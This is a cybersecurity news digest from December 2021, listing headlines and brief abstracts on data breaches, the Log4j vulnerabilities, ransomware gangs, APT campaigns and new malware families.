December, 2021
December 31, 2021 – Breach
Confusing data breach in Rhode Island leads to AG investigation Full Text
Abstract
Earlier this week, the ACLU of Rhode Island asked RIPTA to explain why the personal information of people with no connection to the agency was included in the data breach.ZDNet
December 31, 2021 – Breach
PulseTV discloses potential compromise of 200,000 credit cards Full Text
Abstract
PulseTV (pulsetv.com), an American e-store that uses TV as a medium to reach customers, has disclosed a large-scale customer credit card compromise.BleepingComputer
December 31, 2021 – Breach
The Have I Been Pwned service now includes 441K accounts stolen by RedLine malware Full Text
Abstract
The Have I Been Pwned data breach notification service now includes credentials for 441K accounts that were stolen by RedLine malware. The Have I Been Pwned data breach notification service now allows victims of the RedLine malware to check if their...Security Affairs
December 31, 2021 – Breach
Top 10 healthcare breaches in the U.S. exposed data of 19 million Full Text
Abstract
The healthcare sector has been the target of hundreds of cyberattacks this year. A tally of public data breach reports so far shows that tens of millions of healthcare records have been exposed to unauthorized parties.BleepingComputer
December 31, 2021 – Vulnerabilities
Multiple flaws in Netgear Nighthawk R6700v3 router are still unpatched Full Text
Abstract
Researchers discovered multiple high-risk vulnerabilities affecting the latest firmware version for the Netgear Nighthawk R6700v3 router. Researchers from Tenable have discovered multiple vulnerabilities in the latest firmware version (version 1.0.4.120)...Security Affairs
December 31, 2021 – Vulnerabilities
Netgear leaves vulnerabilities unpatched in Nighthawk router Full Text
Abstract
Researchers have found half a dozen high-risk vulnerabilities in the latest firmware version for the Netgear Nighthawk R6700v3 router. At publishing time the flaws remain unpatched.BleepingComputer
December 31, 2021 – Malware
How to implant a malware in hidden area of SSDs with Flex Capacity feature Full Text
Abstract
Researchers devised a series of attacks against SSDs that could allow to implant malware in a location that is not monitored by security solutions. Korean researchers devised a series of attacks against solid-state drives (SSDs) that could allow to implant...Security Affairs
December 30, 2021 – General
Hillicon Valley — Tech’s big year Full Text
Abstract
Today is Thursday. Welcome to Hillicon Valley, detailing all you need to know about tech and cyber news from Capitol Hill to Silicon Valley. Subscribe here: thehill.com/newsletter-signup.The Hill
December 30, 2021 – Malware
New iLOBleed Rootkit Targeting HP Enterprise Servers with Data Wiping Attacks Full Text
Abstract
A previously unknown rootkit has been found setting its sights on Hewlett-Packard Enterprise's Integrated Lights-Out ( iLO ) server management technology to carry out in-the-wild attacks that tamper with the firmware modules and completely wipe data off the infected systems. The discovery, which is the first instance of real-world malware in iLO firmware, was documented by Iranian cybersecurity firm Amnpardaz this week. "There are numerous aspects of iLO that make it an ideal utopia for malware and APT groups: Extremely high privileges (above any level of access in the operating system), very low-level access to the hardware, being totally out of the sight of the admins, and security tools, the general lack of knowledge and tools for inspecting iLO and/or protecting it, the persistence it provides for the malware to remain even after changing the operating system, and in particular being always running and never shutting down," the researchers said . Besides managinThe Hacker News
December 30, 2021 – General
What the Rise in Cyber-Recon Means for Your Security Strategy Full Text
Abstract
Expect many more zero-day exploits in 2022, and cyberattacks using them being launched at a significantly higher rate, warns Aamir Lakhani, researcher at FortiGuard Labs.Threatpost
December 30, 2021 – Policy and Law
K-12 Cybersecurity Act Signed Into Law Full Text
Abstract
Present Joe Biden signed the K-12 Cybersecurity Act into law, which lays out four objectives with the goal of strengthening the cybersecurity of the United States’ K-12 educational institutions.Security Intelligence
December 30, 2021 – APT
Chinese APT Hackers Used Log4Shell Exploit to Target Academic Institution Full Text
Abstract
A never-before-seen China-based targeted intrusion adversary dubbed Aquatic Panda has been observed leveraging critical flaws in the Apache Log4j logging library as an access vector to perform various post-exploitation operations, including reconnaissance and credential harvesting on targeted systems. Cybersecurity firm CrowdStrike said the infiltration, which was ultimately foiled, was aimed at an unnamed "large academic institution." The state-sponsored group is believed to have been operating since mid-2020 in pursuit of intelligence collection and industrial espionage, with its attacks primarily directed against companies in the telecommunications, technology, and government sectors. The attempted intrusion exploited the newly discovered Log4Shell flaw (CVE-2021-44228, CVSS score: 10.0) to gain access to a vulnerable instance of the VMware Horizon desktop and app virtualization product, followed by running a series of malicious commands orchestrated to fetch thrThe Hacker News
December 30, 2021 – Government
President enacts Ukraine’s Information Security Strategy Full Text
Abstract
Amid extreme concerns of cyber warfare from Russia, Ukraine’s President Volodymyr Zelensky announced the launch of a new information security strategy policy that came into effect earlier this week.Ukrinform
December 30, 2021 – General
Why Cyber Due Diligence Is Essential to the M&A Process Full Text
Abstract
M&A creates a period of transition, where new ownership and management teams are coming into or out of their roles. This transitional phase presents a perfect opportunity for cybercriminals to attack.Dark Reading
December 30, 2021 – Breach
Have I Been Pwned adds 441K accounts stolen by RedLine malware Full Text
Abstract
The Have I Been Pwned data breach notification service now lets you check if your email and password are one of 441,000 accounts stolen in an information-stealing campaign using RedLine malware.BleepingComputer
December 30, 2021 – Hacker
Chinese Hacker Group Uses Log4j Exploit to Target Academic Institution Full Text
Abstract
A Chinese hacker group known for industrial espionage and intelligence collection used a vulnerability in Log4j to go after a large academic institution, researchers at CrowdStrike revealed Wednesday.Cyberscoop
December 30, 2021 – Vulnerabilities
Flaws in DataVault encryption software impact multiple storage devices Full Text
Abstract
Researchers found several vulnerabilities in third-party encryption software that is used by multiple storage devices from major vendors. Researcher Sylvain Pelissier has discovered that the DataVault encryption software made by ENC Security and used...Security Affairs
December 30, 2021 – Breach
University loses 77TB of research data due to backup error Full Text
Abstract
The Kyoto University in Japan has lost about 77TB of research data due to an error in the backup system of its Hewlett-Packard supercomputer.BleepingComputer
December 30, 2021 – General
It’s time for a unified approach to securing data, applications, and the edge Full Text
Abstract
Organizations usually manage the security of data, applications, and edge computing from disparate technologies and across different teams. This traditional approach may prove ineffective in future.Help Net Security
December 30, 2021 – Malware
New iLOBleed Rootkit, the first time ever that malware targets iLO firmware Full Text
Abstract
A previously unknown rootkit, dubbed iLOBleed, was used in attacks aimed at HP Enterprise servers that wiped data off the infected systems. iLOBleed, is a previously undetected rootkit that was spotted targeting the HP Enterprise's Integrated Lights-Out...Security Affairs
December 30, 2021 – Vulnerabilities
Firmware attack can drop persistent malware in hidden SSD area Full Text
Abstract
Korean researchers have developed a set of attacks against some solid-state drives (SSDs) that could allow planting malware in a location that's beyond the reach of the user and security solutions.BleepingComputer
December 30, 2021 – Criminals
AvosLocker ransomware gang releases a free decryptor after an affiliate hit US gov agency Full Text
Abstract
The AvosLocker ransomware operators released a free decryptor after they accidentally encrypted the system of US Government entity. The AvosLocker ransomware operation provided a free decryptor after they encrypted the systems of a US government agency. https://twitter.com/pancak3lullz/status/1476217440442925057 According...Security Affairs
December 30, 2021 – Phishing
Twitter account of FBI’s fake chat app, ANOM seen trolling today Full Text
Abstract
The Twitter account previously associated with the ANOM chat app is posting frivolous tweets this week. ANOM was a fake encrypted messaging platform created as part of a global sting operation led by the U.S. FBI, Australian Federal Police (AFP), and other law enforcement agencies to catch criminals.BleepingComputer
December 30, 2021 – APT
China-linked APT group Aquatic Panda leverages Log4Shell in recent attack Full Text
Abstract
China-linked APT group Aquatic Panda is exploiting the Log4Shell vulnerability to compromise a large academic institution. China-linked cyberespionage group Aquatic Panda was spotted exploiting the Log4Shell vulnerability (CVE 2021-44228) in an attack...Security Affairs
December 29, 2021 – Covid-19
Cyber agency warns of increased threats to manufacturing groups during pandemic Full Text
Abstract
Manufacturing organizations are at higher risk of being targeted by hackers during the COVID-19 pandemic, the nation’s key cybersecurity agency warned Wednesday.The Hill
December 29, 2021 – Cryptocurrency
Ongoing Autom Cryptomining Malware Attacks Using Upgraded Evasion Tactics Full Text
Abstract
An ongoing crypto mining campaign has upgraded its arsenal while evolving its defense evasion tactics that enable the threat actors to conceal the intrusions and fly under the radar, new research published today has revealed. Since first detected in 2019, a total of 84 attacks against its honeypot servers have been recorded to date, four of which transpired in 2021, according to researchers from DevSecOps and cloud security firm Aqua Security, who have been tracking the malware operation for the past three years. That said, 125 attacks have been spotted in the wild in the third quarter of 2021 alone, signaling that the attacks have not slowed down. Initial attacks involved executing a malicious command upon running a vanilla image named "alpine:latest" that resulted in the download of a shell script named "autom.sh." "Adversaries commonly use vanilla images along with malicious commands to perform their attacks, because most organizations trust the officialThe Hacker News
December 29, 2021 – Vulnerabilities
Silent danger: One in five aged domains is malicious, risky, or unsafe Full Text
Abstract
The number of malicious dormant domains is on the rise, and as researchers warn, roughly 22.3% of strategically aged domains pose some form of danger.BleepingComputer
December 29, 2021 – Breach
T-Mobile suffered a new data breach Full Text
Abstract
T-Mobile discloses a new data breach that impacted a "very small number of customers" who were victim of SIM swap attacks. T-Mobile has suffered another security breach, threat actors gained access to the accounts of “a small number of” customers.’...Security Affairs
December 29, 2021 – Criminals
Ransomware gang coughs up decryptor after realizing they hit the police Full Text
Abstract
The AvosLocker ransomware operation provided a free decryptor after learning they encrypted a US government agency.BleepingComputer
December 29, 2021 – Vulnerabilities
Apache Log4j 2.17.1 fixes new remote code execution flaw (CVE-2021-44832) Full Text
Abstract
The Apache Software Foundation released Log4j 2.17.1 version to address recently discovered arbitrary code execution flaw tracked as CVE-2021-44832. The Apache Software Foundation released Log4j 2.17.1 version to address a recently discovered arbitrary...Security Affairs
December 29, 2021 – Breach
T-Mobile says new data breach caused by SIM swap attacks Full Text
Abstract
T-Mobile confirmed that recent reports of a new data breach are linked to notifications sent to a "very small number of customers" that they fell victim to SIM swap attacks.BleepingComputer
December 29, 2021 – Vulnerabilities
Microsoft Defender Log4j scanner triggers false positive alerts Full Text
Abstract
Microsoft Defender for Endpoint is currently showing "sensor tampering" alerts linked to the company's newly deployed Microsoft 365 Defender scanner for Log4j processes.BleepingComputer
December 29, 2021 – Attack
Fintech firm hit by Log4j hack refuses to pay $5 million ransom Full Text
Abstract
One of the largest Vietnamese crypto trading platforms, ONUS, recently suffered a cyber attack on its payment system running a vulnerable Log4j version. Soon enough, threat actors approached ONUS to extort $5 million and threatened to publish customer data should ONUS refuse to comply.BleepingComputer
December 28, 2021 – Privacy
That Toy You Got for Christmas Could Be Spying on You Full Text
Abstract
Security flaws in the recently released Fisher-Price Chatter Bluetooth telephone can allow nearby attackers to spy on calls or communicate with children using the device.Threatpost
December 28, 2021 – Government
Congress zooms in on cybersecurity after banner year of attacks Full Text
Abstract
The past 12 months stand as a banner year in the severity of cyberattacks that wreaked havoc on organizations large and small.The Hill
December 28, 2021 – General
2021 Wants Another Chance (A Lighter-Side Year in Review) Full Text
Abstract
The year wasn’t ALL bad news. These sometimes cringe-worthy/sometimes laughable cybersecurity and other technology stories offer schadenfreude and WTF opportunities, and some giggles.Threatpost
December 28, 2021 – Cryptocurrency
Washington grapples with how to expand crypto oversight Full Text
Abstract
The cryptocurrency explosion has forced Washington to adapt federal financial rules to a quickly growing and changing industry.The Hill
December 28, 2021 – Vulnerabilities
New Apache Log4j Update Released to Patch Newly Discovered Vulnerability Full Text
Abstract
The Apache Software Foundation (ASF) on Tuesday rolled out fresh patches to contain an arbitrary code execution flaw in Log4j that could be abused by threat actors to run malicious code on affected systems, making it the fifth security shortcoming to be discovered in the tool in the span of a month. Tracked as CVE-2021-44832 , the vulnerability is rated 6.6 in severity on a scale of 10 and impacts all versions of the logging library from 2.0-alpha7 to 2.17.0 with the exception of 2.3.2 and 2.12.4. While Log4j versions 1.x are not affected, users are recommended to upgrade to Log4j 2.3.2 (for Java 6), 2.12.4 (for Java 7), or 2.17.1 (for Java 8 and later). "Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4) are vulnerable to a remote code execution (RCE) attack where an attacker with permission to modify the logging configuration file can construct a malicious configuration using a JDBC Appender with a data source referencing a JNDThe Hacker News
December 28, 2021 – Hacker
Experts Detail Logging Tool of DanderSpritz Framework Used by Equation Group Hackers Full Text
Abstract
Cybersecurity researchers have offered a detailed glimpse into a system called DoubleFeature that's dedicated to logging the different stages of post-exploitation stemming from the deployment of DanderSpritz, a full-featured malware framework used by the Equation Group . DanderSpritz came to light on April 14, 2017, when a hacking group known as the Shadow Brokers leaked the exploit tool, among others, under a dispatch titled " Lost in Translation ." Also included in the leaks was EternalBlue , a cyberattack exploit developed by the U.S. National Security Agency (NSA) that enabled threat actors to carry out the NotPetya ransomware attack on unpatched Windows computers. The tool is a modular, stealthy, and fully functional framework that relies on dozens of plugins for post-exploitation activities on Windows and Linux hosts. DoubleFeature is one among them, which functions as a "diagnostic tool for victim machines carrying DanderSpritz," researchers fromThe Hacker News
December 28, 2021 – Vulnerabilities
Log4j 2.17.1 out now, fixes new remote code execution bug Full Text
Abstract
Apache has released another Log4j version, 2.17.1 fixing a newly discovered remote code execution (RCE) vulnerability in 2.17.0, tracked as CVE-2021-44832. Prior to today, 2.17.0 was the most recent version of Log4j and deemed the safest release to upgrade to, but that advice has now evolved.BleepingComputer
December 28, 2021 – Malware
New Flagpro malware linked to Chinese state-backed hackers Full Text
Abstract
The cyber-espionage APT (advanced persistent threat) group tracked as 'BlackTech' was spotted using a novel malware called 'Flagpro' in attacks against Japanese firms.BleepingComputer
December 28, 2021 – Malware
RedLine malware shows why passwords shouldn’t be saved in browsers Full Text
Abstract
The RedLine information-stealing malware targets popular web browsers such as Chrome, Edge, and Opera, demonstrating why storing your passwords in browsers is a bad idea.BleepingComputer
December 28, 2021 – Breach
LastPass users warned their master passwords are compromised Full Text
Abstract
Many LastPass users report that their master passwords have been compromised after receiving email warnings that someone tried to use them to log into their accounts from unknown locations.BleepingComputer
December 28, 2021 – Malware
Riskware Android streaming apps found on Samsung’s Galaxy store Full Text
Abstract
Samsung's official Android app store, called the Galaxy Store, has had an infiltration of riskware apps that triggered multiple Play Protect warnings on people's devices.BleepingComputer
December 27, 2021
Global Cyberattacks from Nation-State Actors Posing Greater Threats Full Text
Abstract
Casey Ellis, CTO at Bugcrowd, outlines how international relations have deteriorated into a new sort of Cold War, with espionage playing out in the cyber-domain.Threatpost
December 27, 2021
Shutterfly hit by ransomware attack Full Text
Abstract
Photography company Shutterfly announced this week that it had been hit by a ransomware attack that had impacted some services, making it the latest in a string of companies to be targeted by hackers looking for a payout.The Hill
December 27, 2021
The 5 Most-Wanted Threatpost Stories of 2021 Full Text
Abstract
A look back at what was hot with readers in this second year of the pandemic.Threatpost
December 27, 2021
Garrett Walk-Through Metal Detectors Can Be Hacked Remotely Full Text
Abstract
A number of security flaws have been uncovered in a networking component in Garrett Metal Detectors that could allow remote attackers to bypass authentication requirements, tamper with metal detector configurations, and even execute arbitrary code on the devices. "An attacker could manipulate this module to remotely monitor statistics on the metal detector, such as whether the alarm has been triggered or how many visitors have walked through," Cisco Talos noted in a disclosure publicized last week. "They could also make configuration changes, such as altering the sensitivity level of a device, which potentially poses a security risk to users who rely on these metal detectors." Talos security researcher Matt Wiseman has been credited with discovering and reporting these vulnerabilities on August 17, 2021. Patches have been released by the vendor on December 13, 2021. The flaws reside in Garrett iC Module , which enables users to communicate to walk-through meThe Hacker News
December 27, 2021
PECB Certified Lead Ethical Hacker: Take Your Career to the Next Level Full Text
Abstract
Cybercrime is increasing exponentially and presents devastating risks for most organizations. According to Cybercrime Magazine, global cybercrime damage is predicted to hit $10.5 trillion annually as of 2025. One of the more recent and increasingly popular forms of tackling such issues by identifying is ethical hacking. This method identifies potential security vulnerabilities in its early stages. Certified ethical hackers use advanced tools and strategies to prevent cyberattacks and help organizations strengthen their cybersecurity. Why Companies Should Hire Ethical Hackers As cyberattacks constantly evolve and improve, organizations must ensure that their defense systems and approach can keep up with the level and complexity of cyberattacks. In today's business era, organizations cannot afford to operate without identifying the vulnerabilities in their system and taking preventive measures. As such, ethical hackers provide several advantages: they offer a unique outsider's perspThe Hacker News
December 27, 2021
‘Spider-Man: No Way Home’ Pirated Downloads Contain Crypto-Mining Malware Full Text
Abstract
Peter Parker might not be a mastermind cryptocurrency criminal, but the name Spiderman is quickly becoming more associated with the mining landscape. ReasonLabs , a leading provider of cybersecurity prevention and detection software, recently discovered a new form of malware hacking into customer computers in the guise of the latest Spiderman movie. As perhaps the most talked-about movie for some time , Spiderman: No Way Home represents an excellent opportunity for hackers. It's a chance to connect with millions of potential targets, and hack into computers all around the globe. All today's malicious actors need to do is promise their victims access to the latest movie, and they get an all-access pass to their PC. The cryptocurrency mining malware discovered by ReasonLabs disguises itself as a torrent for the Spiderman: No Way Home movie, encouraging viewers around the world to download the file, and open the computer to criminals. Using a Mask: Tricking Users into DowThe Hacker News
December 27, 2021
QNAP NAS devices hit in surge of ech0raix ransomware attacks Full Text
Abstract
Users of QNAP network-attached storage (NAS) devices are reporting attacks on their systems with the eCh0raix ransomware, also known as QNAPCrypt.BleepingComputer
December 27, 2021
Shutterfly services disrupted by Conti ransomware attack Full Text
Abstract
Photography and personalized photo giant Shutterfly has suffered a Conti ransomware attack that allegedly encrypted thousands of devices and stole corporate data.BleepingComputer
December 22, 2021
Understanding the Offense’s Systemwide Advantage in Cyberspace Full Text
Abstract
Attackers in cyberspace have had the systemwide advantage for decades. Reversing this requires both a more nuanced understanding of the offense-defense balance and innovations with leverage that works at scale across the internet.Lawfare
December 22, 2021
Harris calls for ‘cyber doctrine’ to address increasing attacks Full Text
Abstract
Vice President Harris is calling for a “cyber doctrine” and greater international coordination to address cybersecurity concerns after a year of mounting attacks.The Hill
December 22, 2021
Five Eyes nations warn of cyber threats from Apache vulnerability Full Text
Abstract
Federal agencies in the United States, as well as top cybersecurity agencies in the other countries that make up the Five Eyes intelligence alliance, warned Wednesday that hackers are “actively exploiting” a recently uncovered vulnerability in Apache logging library log4j.The Hill
December 21, 2021
DHS expands bug bounty program to encourage hunting down Apache vulnerability Full Text
Abstract
The Department of Homeland Security (DHS) is expanding its recently announced bug bounty program for cyber vulnerabilities to include incentives for hackers to hunt down issues related to the Apache logging library log4j vulnerability.The Hill
December 21, 2021
UAE agency put spyware on phone of Jamal Khashoggi’s wife prior to murder: report Full Text
Abstract
A United Arab Emirates (UAE) agency downloaded spyware from Israeli company NSO Group onto the phone of former reporter Jamal Khashoggi’s wife months before Khashoggi’s murder, new findings published Tuesday concluded.The Hill
December 20, 2021
Towards OECD Principles for Government Access to Data Full Text
Abstract
Nascent OECD work to identify principles on government access to data for law enforcement and national security purposes can have important normative significance but also faces political hurdles.Lawfare
December 20, 2021
Belgian defense ministry hacked by attackers exploiting Apache vulnerability Full Text
Abstract
Belgium’s Ministry of Defense was recently hacked by attackers exploiting the massive vulnerability in Apache logging library log4j that has become a worldwide security concern, according to multiple reports.The Hill
December 20, 2021
Justice Department indicts Russian hacker for allegedly participating in trading scheme Full Text
Abstract
A Russian national was indicted and extradited to the United States this week for allegedly hacking into the networks of U.S. groups involved in stock market trading to profit from insider information, the Justice Department announced Monday.The Hill
December 19, 2021 – Malware
New stealthy DarkWatchman malware hides in the Windows Registry Full Text
Abstract
A new malware named 'DarkWatchman' has emerged in the cybercrime underground, and it's a lightweight and highly-capable JavaScript RAT (Remote Access Trojan) paired with a C# keylogger.BleepingComputer
December 19, 2021 – Criminals
Clop ransomware gang is leaking confidential data from the UK police Full Text
Abstract
Clop ransomware gang stolen confidential data from the UK police and leaked it in the dark web because the victim refused to pay the ransom Clop ransomware operators have stolen confidential information held by some British police, according to the media...Security Affairs
December 19, 2021 – General
Security Affairs newsletter Round 345 Full Text
Abstract
A new round of the weekly Security Affairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box. If you want to also receive for free the newsletter with the international press subscribe here....Security Affairs
December 19, 2021 – Ransomware
TellYouThePass ransomware resurges and exploits Log4Shell in recent attacks Full Text
Abstract
The TellYouThePass ransomware resurged and exploits the Apache Log4j flaw (Log4Shell) to target both Linux and Windows systems. Researchers from KnownSec 404 Team and Sangfor Threat Intelligence Team reported that the TellYouThePass ransomware resurged...Security Affairs
December 18, 2021 – Hacker
Trend Micro Spots Chinese Hackers Targeting Transportation Sector Full Text
Abstract
Since the middle of 2020, a Chinese state-sponsored threat actor called 'Tropic Trooper' has been targeting transportation organizations and government entities related to the transportation sector, Trend Micro reports.Security Week
December 18, 2021 – Vulnerabilities
New Local Attack Vector Expands the Attack Surface of Log4j Vulnerability Full Text
Abstract
Cybersecurity researchers have discovered an entirely new attack vector that enables adversaries to exploit the Log4Shell vulnerability on servers locally by using a JavaScript WebSocket connection. "This newly-discovered attack vector means that anyone with a vulnerable Log4j version on their machine or local private network can browse a website and potentially trigger the vulnerability," Matthew Warner, CTO of Blumira, said . "At this point, there is no proof of active exploitation. This vector significantly expands the attack surface and can impact services even running as localhost which were not exposed to any network." WebSockets allow for two-way communications between a web browser (or other client application) and a server, unlike HTTP, which is unidirectional where the client sends the request and the server sends the response. While the issue can be resolved by updating all local development and internet-facing environments to Log4j 2.16.0, Apache oThe Hacker News
December 18, 2021 – Vulnerabilities
Western Digital warns customers to update their My Cloud devices Full Text
Abstract
Western Digital is urging customers to update their WD My Cloud devices to the latest available firmware to keep receiving security updates on My Cloud OS firmware reaching the end of support.BleepingComputer
December 18, 2021 – Vulnerabilities
Understanding the Impact of Apache Log4j Vulnerability Full Text
Abstract
More than 35,000 Java packages, amounting to over 8% of the Maven Central repository, have been impacted by the recently disclosed log4j vulnerabilities (1, 2), with widespread fallout across the software industry.December 18, 2021 – Vulnerabilities
Apache Issues 3rd Patch to Fix New High-Severity Log4j Vulnerability Full Text
Abstract
The issues with Log4j continued to stack up as the Apache Software Foundation (ASF) on Friday rolled out yet another patch — version 2.17.0 — for the widely used logging library that could be exploited by malicious actors to stage a denial-of-service (DoS) attack. Tracked as CVE-2021-45105 (CVSS score: 7.5), the new vulnerability affects all versions of the tool from 2.0-beta9 to 2.16.0, which the open-source nonprofit shipped earlier this week to remediate a second flaw that could result in remote code execution ( CVE-2021-45046 ), which, in turn, stemmed from an "incomplete" fix for CVE-2021-44228 , otherwise called the Log4Shell vulnerability. "Apache Log4j2 versions 2.0-alpha1 through 2.16.0 did not protect from uncontrolled recursion from self-referential lookups," the ASF explained in a revised advisory. "When the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, $${ctx:loginId}), attackers with control oThe Hacker News
December 18, 2021 – Denial Of Service
Upgraded to log4j 2.16? Surprise, there’s a 2.17 fixing DoS Full Text
Abstract
Yesterday, BleepingComputer summed up all the log4j and logback CVEs known thus far. Ever since the critical log4j zero-day saga began last week, security experts have time and time again recommended version 2.16 as the safest release to be on. That changes today with version 2.17.0 out that fixes CVE-2021-45105, a DoS vulnerability.BleepingComputer
December 18, 2021 – Vulnerabilities
Western Digital customers have to update their My Cloud devices to latest firmware version Full Text
Abstract
My Cloud OS firmware is reaching the end of support, Western Digital customers have to update their WD My Cloud devices to the latest version. Western Digital is urging customers to update their WD My Cloud devices to the latest firmware version to continues...Security Affairs
December 18, 2021 – Vulnerabilities
Apache releases the third patch to address a new Log4j flaw Full Text
Abstract
Multiple flaws in the Log4J library are scaring organizations worldwide while threat actors are already exploiting them. 2.17 is the third fix issued in a week. While the experts were warning that threat actors are actively attempting to exploit...Security Affairs
December 18, 2021 – Breach
1.8 Million customers of four sports gear sites impacted by credit cards breach Full Text
Abstract
A cyber attack hit four affiliated online sports gear sites and resulted in the theft of credit cards for 1,813,224 customers. Threat actors have stolen credit cards belonging to 1,813,224 customers of four affiliated online sports gear sites. Below...Security Affairs
December 17, 2021 – Vulnerabilities
Federal agencies ordered to immediately patch systems against Apache vulnerability Full Text
Abstract
Federal agencies on Friday were ordered to immediately investigate and patch systems to prevent exploitation of a massive vulnerability in Apache logging library log4j that has been increasingly used by nations and cybercriminals to target organizations around the world.The Hill
December 17, 2021 – Ransomware
Convergence Ahoy: Get Ready for Cloud-Based Ransomware Full Text
Abstract
Oliver Tavakoli, CTO at Vectra AI, takes us inside the coming nexus of ransomware, supply-chain attacks and cloud deployments.Threatpost
December 17, 2021 – Criminals
Conti Gang Suspected of Ransomware Attack on McMenamins Full Text
Abstract
The incident occurred last weekend at the popular chain of restaurants, hotels and breweries, which is still facing disruptions.Threatpost
December 17, 2021 – Ransomware
Ransomware Attackers Have ‘Industry Standards’ Too Full Text
Abstract
In July 2021, KELA discovered 48 discussion threads on dark web marketplaces. From those threads, KELA determined that ransomware actors look for certain criteria when looking to purchase accesses.Security Intelligence
December 17, 2021 – Privacy
Facebook Bans 7 ‘Cyber Mercenary’ Companies for Spying on 50,000 Users Full Text
Abstract
Meta Platforms on Thursday revealed it took steps to deplatform seven cyber mercenaries that it said carried out "indiscriminate" targeting of journalists, dissidents, critics of authoritarian regimes, families of opposition, and human rights activists located in over 100 countries, amid mounting scrutiny of surveillance technologies. To that end, the company said it alerted 50,000 users of Facebook and Instagram that their accounts were spied on by the companies, who offer a variety of services that run the spyware gamut from hacking tools for infiltrating mobile phones to creating fake social media accounts to monitor targets. It also removed 1,500 Facebook and Instagram accounts linked to these firms. "The global surveillance-for-hire industry targets people across the internet to collect intelligence, manipulate them into revealing information and compromise their devices and accounts," Meta's David Agranovich and Mike Dvilyanski said. "These compaThe Hacker News
December 17, 2021 – Ransomware
The Week in Ransomware - December 17th 2021 - Enter Log4j Full Text
Abstract
A critical Apache Log4j vulnerability took the world by storm this week, and now it is being used by threat actors as part of their ransomware attacks.BleepingComputer
December 17, 2021 – Vulnerabilities
Firefox fixes password leak via Windows Cloud Clipboard feature Full Text
Abstract
At its core, the bug is related to Windows Cloud Clipboard, a feature added to Windows 10 v1809 release, a feature that allows users to sync their local clipboard history to their Microsoft accounts.The Record
December 17, 2021 – Malware
New PseudoManuscrypt Malware Infected Over 35,000 Computers in 2021 Full Text
Abstract
Industrial and government organizations, including enterprises in the military-industrial complex and research laboratories, are the targets of a new malware botnet dubbed PseudoManyscrypt that has infected roughly 35,000 Windows computers this year alone. The name comes from its similarities to the Manuscrypt malware , which is part of the Lazarus APT group's attack toolset, Kaspersky researchers said, characterizing the operation as a "mass-scale spyware attack campaign." The Russian cybersecurity company said it first detected the series of intrusions in June 2021. At least 7.2% of all computers attacked by the malware are part of industrial control systems (ICS) used by organizations in engineering, building automation, energy, manufacturing, construction, utilities, and water management sectors that are located mainly in India, Vietnam, and Russia. Approximately a third (29.4%) of non-ICS computers are situated in Russia (10.1%), India (10%), and Brazil (9.The Hacker News
December 17, 2021 – Ransomware
TellYouThePass ransomware revived in Linux, Windows Log4j attacks Full Text
Abstract
Threat actors have revived an old and relatively inactive ransomware family known as TellYouThePass, deploying it in attacks against Windows and Linux devices targeting a critical remote code execution bug in the Apache Log4j library.BleepingComputer
December 17, 2021 – Phishing
Crypto Scam Revenue Touches $7.7 Billion Full Text
Abstract
As per Chainalysis’ 2022 Crypto Crime Report, c rypto scams have earned a revenue of $7.7 billion from victims worldwide. This is an 81% rise from that in 2020. Rug pulls accounted for 37% of all crypto scam revenue.Cyware Alerts - Hacker News
December 17, 2021 – Solution
How to Prevent Customer Support Help Desk Fraud Using VPN and Other Tools Full Text
Abstract
It's no secret that the internet isn't a very safe place. And it's not hard to understand why. It's a medium that connects billions of people around the world that affords bad actors enough anonymity to wreak havoc without getting caught. It's almost as if the internet's tailor-made to enable scams and fraud. And that's just what it does. Right now, the world's on track to lose $10.5 trillion every year to cybercrime. That number is so large that it's hard for the average person to grasp. And when most people hear it, they imagine that money's coming mostly from large-scale data breaches and ransomware attacks on large companies. Although businesses are among the hardest hit each year, they're by no means the only target. Every day, internet users are targeted too. They face barrages of phishing emails, compromised websites, and booby-trapped downloads. But among all of the attacks aimed at rank-and-file users, there's one that standThe Hacker News
December 17, 2021 – Breach
Credit card info of 1.8 million people stolen from sports gear sites Full Text
Abstract
Four affiliated online sports gear sites have disclosed a cyberattack where threat actors stole credit cards for 1,813,224 customers.BleepingComputer
December 17, 2021 – Hacker
New Report Sheds Light on Earth Centaur Activities Full Text
Abstract
Researchers uncovered details about the Earth Centaur group that has been targeting transportation firms and government agencies associated with transportation. The report suggests that the group attempts to access some internal documents and personal information that may be used in future attacks ... Read MoreCyware Alerts - Hacker News
December 17, 2021 – Vulnerabilities
CISA urges VMware admins to patch critical flaw in Workspace ONE UEM Full Text
Abstract
CISA has asked VMware admins and users today to patch a critical security vulnerability found in the Workspace ONE UEM console that threat actors could abuse to gain access to sensitive information.BleepingComputer
December 17, 2021 – Breach
Desjardins data breach: Class action lawsuit agreement reaches $201 million Full Text
Abstract
A class-action lawsuit against Canadian financial services firm Desjardins has provisionally settled for $156 million after a 2019 data breach exposed the personal information of 10 million customers.The Daily Swig
December 17, 2021 – Criminals
Conti ransomware gang exploits Log4Shell bug in its operations Full Text
Abstract
The Conti ransomware gang is the first ransomware operation exploiting the Log4Shell vulnerability to target VMware vCenter Servers. Conti ransomware gang is the first professional race that leverages Log4Shell exploit to compromise VMware vCenter...Security Affairs
December 17, 2021 – Government
US orders federal govt agencies to patch critical Log4j bug Full Text
Abstract
US Federal Civilian Executive Branch agencies have been ordered to patch the critical and actively exploited Log4Shell security vulnerability in the Apache Log4j library within the next six days.BleepingComputer
December 17, 2021 – Solution
Google unleashes security ‘fuzzer’ on Log4Shell bug in open-source software Full Text
Abstract
To seek out Log4Shell vulnerabilities in newly built open-source software, Google is partnering with security firm Code Intelligence to provide continuous fuzzing for Log4j.ZDNet
December 17, 2021 – Vulnerabilities
VMware fixes critical SSRF flaw in Workspace ONE UEM Console Full Text
Abstract
VMware released security patches for a critical server-side request forgery (SSRF) vulnerability in Workspace ONE UEM console. VMware has addressed a critical server-side request forgery (SSRF) vulnerability, tracked as CVE-2021-22054, in the Workspace...Security Affairs
December 17, 2021 – Attack
Logistics giant warns of BEC emails following ransomware attack Full Text
Abstract
Hellmann Worldwide is warning customers of an increase in fraudulent calls and emails regarding payment transfer and bank account changes after a recent ransomware attack.BleepingComputer
December 17, 2021 – Botnet
Phorpiex botnet is back, in 2021 it $500K worth of crypto assets Full Text
Abstract
Experts reported the resurgence of the Phorpiex botnet, in one year it allowed to steal crypto assets worth of half a million dollars. Experts at Check Point Research have monitored the resurgence of the Phorpiex botnet, an old threat that was involved...Security Affairs
December 17, 2021 – Ransomware
